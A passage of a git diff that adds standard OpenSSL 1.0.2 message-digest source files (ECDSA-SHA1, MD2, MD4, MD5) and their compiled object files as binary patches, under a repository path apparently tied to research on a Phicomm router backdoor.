z$r|xIzktQLL3IAH_s=P|I~p4w8W{Y@FA_O7{0O3}qQMekUozN21X~w2B)XTvp7qm@
z<EZ|4<c?zQI{SaK;#?^#7a8;!b<DMZtFP<1F7cKWQjT{K^WS37u`B&haf2I}`Jm}`
z?KoZN+NKdF%=WazY2XyR%>?@qmRSZ-Jkx_e>%m_#zrrh?Vhz!KEV3O{ztV$K#VIzM
zNqdvF%GJUSwd%!!=Tf;^_6QwLrAW?Vet9mPcb2o+mCUNMnx4yN99qexlTOx8^3Am%
z)3=w9o_X=quT2XpX{TA<uKLD1w^80|(=;Z{g6|S<`_FM8BY-S8DX^96SqI1Zluxn^
z0l&;m`4}Jz&M(HWxIrxcdBXL4O@z3(lrp%+0_6;@-zbnJ9Al!XnCk`CT3ScrElGGK
zTDk5s+0AyvD{Qd#8i6jU)o^zTw&(78Wb-B#$lho+$@VFHSazdE_GYb8ajP6vt$D7^
zx6V}4D{Q_If4kbU>y297ZFp_Tc1zAyqfl{WPXD7UPR5>`4;4v?KNI4JHD#O~>~+e7
zY+HaVul;B6Js?-Va6J!qn1P3HsJ7&VRe1b+9Dtf<&40+bQR5#lhnV*kd<zdll59t<
z|3KES`M3}8PYJJoo*BkZa5JSN&Rr9-t?O5vH<%fEO9M<85sPz;+Y;y6lnKeVOvtv*
zU$MsqLc{qv$uDW3=x~0GdDQ#sM4TVo_L{HfCu(dA^;yR6h{k_uI3gc+UHI%UqE7;K
a|G*$pE^zpXJ1#1J9h=Rv7pU$toc|XHW3_Go

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_ecdsa.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_ecdsa.c
new file mode 100644
index 0000000..803d314
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_ecdsa.c
@@ -0,0 +1,154 @@
+/* crypto/evp/m_ecdsa.c */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+
+#ifndef OPENSSL_NO_SHA
+
+static int init(EVP_MD_CTX *ctx)
+{
+    return SHA1_Init(ctx->md_data);
+}
+
+static int update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return SHA1_Update(ctx->md_data, data, count);
+}
+
+static int final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return SHA1_Final(md, ctx->md_data);
+}
+
+static const EVP_MD ecdsa_md = {
+    NID_ecdsa_with_SHA1,
+    NID_ecdsa_with_SHA1,
+    SHA_DIGEST_LENGTH,
+    EVP_MD_FLAG_PKEY_DIGEST,
+    init,
+    update,
+    final,
+    NULL,
+    NULL,
+    EVP_PKEY_ECDSA_method,
+    SHA_CBLOCK,
+    sizeof(EVP_MD *) + sizeof(SHA_CTX),
+};
+
+const EVP_MD *EVP_ecdsa(void)
+{
+    return (&ecdsa_md);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_ecdsa.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_ecdsa.o
new file mode 100644
index 0000000000000000000000000000000000000000..6a7e44ac2901213a79df07f004038f2c83f1e278
GIT binary patch
literal 2352
zcmb`ITWb?h5XWb`)mE)-y*w1EvLHx{c1g4-6_K<xHwaeRMto4Vn{?Y0n+wSX(mq%p
ze6SS3kKjk}BM83uF?`fV@xdZOojE(RJsvhM>cH;&=eK9(TywIQE#(F*3&bqA566*E
zfYym)ol!CaV=xNe$FBS=?jIKRe-sZ|6JO~Ip~Aslzu=9k^ikCSc!!<QbCKf#_W#pm
zuvpD3m|tAH>r9m^-A34T=G<FuY9@WBtHSh)n<+OnJ00ODaS+`&J~a6J!!qDFKM=F=
zA(Qc2yUSqp#;wVbq2aeUFUq;3S^!*NPb|gyti~QBuqVt$*!Od^XM^zVDCxVMxT7?7
z8U3GGHdZq241xizj?Cp8bBSd>6U-g-WWq0_w$v&r486#yx2<sv<0yyqFxEDlinT6m
zIIV}VwqYpNBCesJ{V?qwf+U{r!&mz7XUNavjAzi3#rs(Ig6ew5cdM|m)$q5W+gkU-
z0Ja)iA*e52eI2}fX=!1;<SpfLE7?_Vb$+3g^<bqipZ0PpOUZJSs&tX^vyUG|)d6Os
zZt1+L)%tZ5*%))$Y0|>wtP-dB3!g?!Mx6FsIPEhToj>Zs!H3LI?_)0KW6Izh#_g#F
zJ!1O!iA$XVH<0!Y$4?C|>ke*brylwh^kF;lHBs$g+jqmD7lMm>;DcM~bih@VVp49q
z>25cxxKD1iS+55TY};stfs1#+OegfK&pF;~blq0F*$Ud>4%Y~3-bUN62RyQWa}K7{
zTAwt^WH_EPIJMPn5(C=9j1EzM=Br?hIh|9=m0zChGyPtOn>WV}vLrM6zk!XY=HKSu
z#@wX-Um_>d?-Pn0dTEwMoizUpK{Pp6G=IA5&G{FRQU7v(qf~at{yKYcGJo;Q_(8O^
zA%8UqCbX>}qg#y5y>3&S@8}S<j9>6B3TkTR7dXEr4cVLdUF1pY_nOyljq_;z=oXfI
xIX_8#Q_6ep{}X%qzZgx(ryJiqJBXmiaFYVfxLi!=?n=u4!sCAxw~U0D{~NLmua^J-

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md2.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md2.c
new file mode 100644
index 0000000..3c4cd7b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md2.c
@@ -0,0 +1,106 @@
+/* crypto/evp/m_md2.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_MD2
+
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include <openssl/x509.h>
+# include <openssl/md2.h>
+# ifndef OPENSSL_NO_RSA
+#  include <openssl/rsa.h>
+# endif
+
+static int init(EVP_MD_CTX *ctx)
+{
+    return MD2_Init(ctx->md_data);
+}
+
+static int update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return MD2_Update(ctx->md_data, data, count);
+}
+
+static int final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return MD2_Final(md, ctx->md_data);
+}
+
+static const EVP_MD md2_md = {
+    NID_md2,
+    NID_md2WithRSAEncryption,
+    MD2_DIGEST_LENGTH,
+    0,
+    init,
+    update,
+    final,
+    NULL,
+    NULL,
+    EVP_PKEY_RSA_method,
+    MD2_BLOCK,
+    sizeof(EVP_MD *) + sizeof(MD2_CTX),
+};
+
+const EVP_MD *EVP_md2(void)
+{
+    return (&md2_md);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md2.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md2.o
new file mode 100644
index 0000000000000000000000000000000000000000..00cb09fc810aaeb6cb73c6c7df7d2e7aa0ba1e44
GIT binary patch
literal 1080
zcmbVL%}T>S5T11F?@4chmv~aqE@@Rn4-zP~7ZEQ7JxP)Vg_0kV4cLpmf{){|ujCWx
zOtOp1Zt9@}vorI}e6zE=$;asKw&OUU#DN?5ixdj*rGb78`>+jL0OR5C+C7?tRVpg?
zil1?>*T1alu>U^rxOaZsz)i0%njO?N)bafUIsgm880vpQ+jrsnr>%yyPE0+qdyB9o
zyRmvIo4{b*1`%O6ktNA<G9B;;fS2<`1R+{cH1<__B7PIVr-2B7hh+&o%912b5lb@>
zbG(;cDS~Jw<CnDJd6DIDA?DV8D+2q-qdPTE<}c}|J%3$sfGc6<yZLq2UQGTWmTaP~
z%0ERe_4H76@nvwLgXpXMmA%j~y>zArny+{Y8lkg+YJOq4EO4b&hR&)B^)tDY|CB`w
nX^E$lpgoD>pJ&}2r5@y<l-I?ae;1SH-BbOOEPT|-=$rgsS>-q>

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md4.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md4.c
new file mode 100644
index 0000000..851de69
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md4.c
@@ -0,0 +1,108 @@
+/* crypto/evp/m_md4.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_MD4
+
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include <openssl/x509.h>
+# include <openssl/md4.h>
+# ifndef OPENSSL_NO_RSA
+#  include <openssl/rsa.h>
+# endif
+
+# include "evp_locl.h"
+
+static int init(EVP_MD_CTX *ctx)
+{
+    return MD4_Init(ctx->md_data);
+}
+
+static int update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return MD4_Update(ctx->md_data, data, count);
+}
+
+static int final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return MD4_Final(md, ctx->md_data);
+}
+
+static const EVP_MD md4_md = {
+    NID_md4,
+    NID_md4WithRSAEncryption,
+    MD4_DIGEST_LENGTH,
+    0,
+    init,
+    update,
+    final,
+    NULL,
+    NULL,
+    EVP_PKEY_RSA_method,
+    MD4_CBLOCK,
+    sizeof(EVP_MD *) + sizeof(MD4_CTX),
+};
+
+const EVP_MD *EVP_md4(void)
+{
+    return (&md4_md);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md4.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md4.o
new file mode 100644
index 0000000000000000000000000000000000000000..07d9669c9c8f6f4f03ea0cc222508cde03140421
GIT binary patch
literal 2456
zcmbuB-%k@k5Xa{@6f_9<BZdTHE}9sKaw*!V_+ZM9mXZ`P{0a}o^MC^y>9x6D4fp`O
z5;XD8@X<fP#DBtn!AIkRjWNOb-tCn2xW2$7do%Odo!Q;nxo!9Jr9y{ckcdIg>BJLC
z^!>t#or}yI^-(YV>bw1C=CD~j{5^A28~A}9pyJVfJLhAR>06Y82vdLH*022Ys*9Z9
zdLl`V{q+Q+>B-4w*3i;w!w(zQnElAkjEp{MMDFO`!;GED4#zkS>|}*CV)4^2mZ*d1
zE11a*awAq`yq_myr{5Ut>FWNZ_H|43$-0myqu3Rt!KPB!ief!Vw^KN?PWpMA)^Dbs
zDAq2k|3Av)Oi8)KphL?ed+AeLeA&-U#Vytl;e%`&(OZl#?Zhg2ni|(Iud-WrTeeA9
z)oC&5@@dG#q^?u^4imilq&#Ji#wXhF**1Kc`8D402y2L(<7>9l@^7}`RB<ZnS$mB(
z%D%fzjoP{!dQ|qyAu;DZa;8gj6XPXku25LWFFK3k6Q#UEvr}285QV^6io;;eAT+=H
z5@~6EVce;gH~q+X=LO}BT`ZO*8!Oa%^tS&V$AWW*pi*E9ms$tM{)7*+4FSK(P51yH
z3+fkhSll31^gQ8GUqcD5T*_%&#sU>JF5f7Sr8wq96VdkzF1aL+jJH(4E2V|YIg?%A
zt%U9>>oAD*mRNze?b@NY6OzrR=#sr!uag~7_^|AtO7>c{Qt^Bq<yS+`=38f^9=dC9
zmA~mX>{?K*c|o|VqP;C=BXBF8TGM%y#lbie+^4$alryG7wlP*0eCIgpoDSKx09oEd
z&-i;ltbE~85BHdXCvPaJOBLQy$@w2}4|1M0{xQd<&40igqTgHaEj%<CWjk&E2WtNk
zkNW_>Darj$GQ<2CZn`v;b6<yS%l<`|G^P)|D+6?xG8T1>+Y)uH%aDq<bjY@>UvS6<
zh9={SDt=1_DxHk4GEaMd&6N7VZ7=asKWTGgsxNB(rqcLb>P?BqFH5p^7|~}112~$f
WbS;8AE-ii~`u9V$*BTic$@qVHTd{Tk

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md5.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md5.c
new file mode 100644
index 0000000..e5d5f71
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md5.c
@@ -0,0 +1,107 @@
+/* crypto/evp/m_md5.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_MD5
+
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include <openssl/x509.h>
+# include <openssl/md5.h>
+# ifndef OPENSSL_NO_RSA
+#  include <openssl/rsa.h>
+# endif
+# include "evp_locl.h"
+
+static int init(EVP_MD_CTX *ctx)
+{
+    return MD5_Init(ctx->md_data);
+}
+
+static int update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return MD5_Update(ctx->md_data, data, count);
+}
+
+static int final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return MD5_Final(md, ctx->md_data);
+}
+
+static const EVP_MD md5_md = {
+    NID_md5,
+    NID_md5WithRSAEncryption,
+    MD5_DIGEST_LENGTH,
+    0,
+    init,
+    update,
+    final,
+    NULL,
+    NULL,
+    EVP_PKEY_RSA_method,
+    MD5_CBLOCK,
+    sizeof(EVP_MD *) + sizeof(MD5_CTX),
+};
+
+const EVP_MD *EVP_md5(void)
+{
+    return (&md5_md);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md5.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/m_md5.o
new file mode 100644
index 0000000000000000000000000000000000000000..64a9e8b05951c878aa7f665f7cc7ee6adb7afd96
GIT binary patch
literal 2456
zcmbuBOHUL*5XWm76f_9<h#|q4i6#c3Ocn(d4`zAnvLuTbUg2OI2N+-@`^fC90S~~H
z5EDO!M?ZpzU&628(RgrUOtAhvUC_+VUZ9ems`^b;Kc=gDcRyRmwWU%dlA@P%>Io(K
zap}~~C^JJn)J?y8?*5%QY~&CB%p6twe&P*K{%F6I^GWseUG+iK&bpIZul6shE^`Mr
zW1VE!Uym`Go}7GP4=k<L%VFIfbDlWqq2XtB<qq#XPCMz5!3al*m?!3l$xpvpqBf#$
zU=}yXtw>So<2<EydQ<&f9i5-~Ln7ynekbz+OKWybYp|&VwxU^=)~yuwtet)xC%v~4
zcNBA%*`Lj_)UKRmSJ-Vc`jNHtXfD32=eFiHYl!fEwo~dWDoi_(Qcug^2Ig6!LYl=Q
z%&J)|y4nnxSk%$P?=iu*kIQogNqnLOpKZaHncv_Q53z>GKE7o;ssGIuoJwwKebiZ_
zjbho`rh0YV3w<h<iy<-RcjQhN<|f7q?p!XnkX>{a$0rI|mu9C%-JD8+wG^enoIz@K
z`8B$w`Gs+}R@^Kr<AWa*H+C^umXS!I-qqLscN_`!9fC6eTe#G^oEPDP2xbAl&P{k9
zAPedjW7ymvwtAj&sjq<;*DhrYF0nv)gUcBOvNgw;Xd>o%!KE+hN8)Xr@J4Ilvd`qy
zc1xkR$~p`py(L!QZ+lMY?}X&=E_&pw)@tM^3LlmeRLEJYluCY?qso=gclg#Bs)gR#
zd+l$Q>rOSORQ({_)!F`*yAgOLU(e|x%I0M33GP!<GTIq4A=`*G1?L=loiQQXHXzG8
z^^DE~a^-|eJv?9r9>1ZaE_M2eijV(@-=NR)=0D}!r11}!L(F>%zKw?=!)zz5|3I%_
z@^K&FHzmIQNoE*7&CQgCb{?9LZCStQg2Bwt`x0Qngjm!yZcEg)DFZs+HX++Gf59Oe
z2#x3Gb^ewFY8}t7Fi-k^jfDEaZ7=y!KS^U_sIPkbhSvC9>Q2bVFH5|37||CE12~50
X?oJ5qxTO3Q_3wvh?<6uZ;`#pp_A{{g

literal 0
HcmV?d00001

